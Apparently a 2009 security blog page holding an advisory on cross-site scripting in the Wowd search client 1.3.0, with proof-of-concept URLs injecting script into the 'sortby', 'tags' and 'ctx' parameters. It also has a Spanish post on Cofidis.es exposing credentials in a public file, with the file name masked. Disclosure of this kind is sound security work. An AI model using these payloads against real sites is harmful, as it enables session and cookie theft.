Wowd search client multiple variable xss

Tuesday, October 27, 2009
##########################################
Wowd search client multiple variable xss
Vendor URL: http://www.wowd.com/
Advisore:http://lostmon.blogspot.com/2009/10/
wowd-search-client-multiple-variable.html
Vendor notify:yes exploit available:yes
##########################################

################
What is Wowd?
################

Wowd is a real-time search engine for discovering
what's popular on the web right now.

In essence, the company has made a peer-to-peer
search engine powered by what other Wowd users
are looking at online rather than studying and
ranking sites based on an arcane link structure.
Taking search and breaking it into millions of
tiny pieces all run by individual users who have
downloaded the Wowd client completely changes
the operation -- and economics -- of a search
engine. The more times that someone in the Wowd
crowd clicks on a link within a recent time
frame, the higher the link's ranking.


##########################
Vulnerability description
##########################

Wowd client contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate In the URI dialog
'sortby' 'tags' and 'ctx' variables upon submision to
'index.html' script. This could allow a user to create
a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship
between the browser and the server,leading loss of integrity.

This issue can be dangerous , because if you are running
Wowd client , you have all of this vulnerabilities because
this issue can be exploited accross all browsers,
include ie8 with the XSS filter ( WoW ! )

#################
Versions
################·

Wowd client 1.3.0 vulnerable
Wowd client 1.3.1 Not vulnerable


#################
SOLUTION
#################

Upgrade to version 1.3.1 or higher, as it has been
reported to fix this vulnerability. An upgrade is
required as there are no known workarounds.


###################
Proof of Concept.
###################

#############
Test
#############

I test it in ie8, firefox 3.5.3 and safari 4

in all cases the xss is executed include ie8 with xss filter :D

a remote user can compose a html document
with a iframe and this source for the iframe:

http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

the browser executes the xss ,if you access directly to
this url the xss is executed too.

aditionaly wen wowd show his results , we have a functionality
to add "tags" to a url.

Example:

http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02

this shows a indexed search with tag 'english' we can add a
crafted tag that allow to execute a xss like:[tag]|[token]

example:

http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02

and it executed the xss in the tags labels.

ctx variable is also afected too

http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
----------------------------------------------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)

Cofidis.es pudo ver sus datos comprometidos

Thursday, October 15, 2009
###########################################
Cofidis.es pudo ver sus datos comprometidos
Vendor: www.cofidis.es
Falla: cedenciales criticas al descubierto
Actualizado:13-02-2010
###########################################
 
Cofidis es una empresa formada por varios grupos de
crédito que agrupan diferentes servicios dentro del
panorama de finanzas mundiales.

La definición según podemos leer en su web:
"Somos líderes europeos del crédito por teléfono:
tenemos más de 8 millones de clientes. En España, Ya
contamos con más de 15 años de experiencia y un equipo
de más de 800 colaboradores."

Cofidis.es pudo verse afectado por un fallo atraves del
cual podrían terceras personas haber podido tener acceso
a datos de carácter personal, al haber dejado al descubierto
las credenciales de acceso root al portal y así mismo al dejar
al descubierto las credenciales de acceso a la base de datos
del portal.

Para hacernos una idea de qué tipo de datos pueden haber sido
vistos o "robados" por terceros, tan solo debemos mirar uno de
los formularios de solicitud de crédito, y por los datos que
se nos piden se puede saber qué tipo de datos podría contener
la base de datos.
https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do

Esta noticia Llego a mí, después observar un post en Twitter
en el cual se daba una url del portal Cofidis.es y el acceso
a un txt sin ningún tipo de protección, y el cual contenía
las credenciales antes mencionadas.

Después de observar esta situación, y hablado con algunos de
los miembros del grupo de discusión e investigación, decidimos
mirar desde cuando podía haberse dado esta circunstancia y el
posible origen de la noticia. Haciendo una búsqueda rápida en
los motores de búsqueda habituales
##################
Actualizacion
##################

al parecer la primera noticia sobre
esta circunstlancia podria ser este post
en un blog en el cual se habla del tema
sin revelar en si las direcciones directas.
Los Post de twiter habrian podido sacar la
informacion para sus post

el post es del dia 11-10-2009

http://86400.es/2009/10/11/
la-seguridad-de-los-que-manejan-nuestro-dinero/

#################################

Llegamos a un Post en twitter del día 12-10-2009.


Y uno posterior del día 13-10-2009.

y otro mas el dia 13-10-2009


El día 14-10-2009 por la tarde el txt que contenía estas
credenciales fue retirado del raíz del portal cofidis.es
Con lo cual se puede pensar que esos datos tan sensibles
pudieron estar al alcance de todo el mundo durante al
menos tres días.

Google muestra en su cache, una imagen de dicho documento
con fecha Del día 13-10-2009 mostrando las credenciales

http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/xxxxx.txt+http://www.cofidis.es/xxxx.txt&cd=8&hl=es&ct=clnk&gl=es


Pero esta sería la fecha en la cual google tomo esa instantánea
de ese documento, pudiendo haber reemplazado a una anterior eso
Los logs del servidor de cofidis deberían mostrar cuando fue la
primera vez que el spider de google pudo rastrear ese txt.

Así mismo si realizamos una búsqueda en google por el fichero txt
entre los resultados primeros puede apreciarse que Google también
revela esas credenciales faltaría saber cuando fue incluido en la
Indexación ese archivo, para intentar averiguar desde que fecha se
pudo haberse producido esta situación.

http://www.google.es/search?q=cofidis.txt


Como pudo Un administrador dejar deliberadamente un archivo
con información tan sensible a la vista de cualquier visitante,
se preguntara más de uno.

Seguramente el admin no sabía nada de la existencia de ese
fichero, o eso creemos o queremos creer) Debió ser un hackeo,
por el tipo de fichero generado y su disposición y los datos
que contiene podría haberse tratado de algún agujero de
seguridad en la web , atraves del cual el atacante hubiese
podido incluir algún archivo externo.
(esta vulnerabilidad es conocida como RFI o remote file include)
pues hay algunos scripts de los que corren por la red, que
justamente hacen eso y mirando su fuente se puede observar que
justamente sacan esos datos de la maquina o inyectan una
Shell en php.

Creo que cofidis debería dar explicaciones de este hecho y así
mismo debería verse como le afecta este acontecimiento a cofidis,
ante la LOPD
y que datos han sido comprometidos, no por mi porque por suerte
yo no me encuentro en su base de datos que yo sepa, pues nunca
necesite sus servicios.

Desde el grupo de investigación y desarrollo de Lostmon's
Groups queremos hacer un llamamiento a que las empresas como
cofidis y otras que trabajan con datos personales tan
sensibles y de tanta confidencialidad, deberían invertir
parte de sus beneficios en asegurar que esos datos no estarán
accesibles y deberían hacer lo posible por protegerlos como
se les pide en la LOPD.

Bien es cierto que en seguridad, no hay nada seguro, o que
lo bonito de la seguridad es la inseguridad que trae por si
misma. Y bien es cierto que por mucho que los administradores
pongan énfasis y empeño en asegurar servicios y sistemas,
siempre hay gente, que va por delante de ellos.

Este analisis ha sido realizado por Climbo y por Lostmon

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...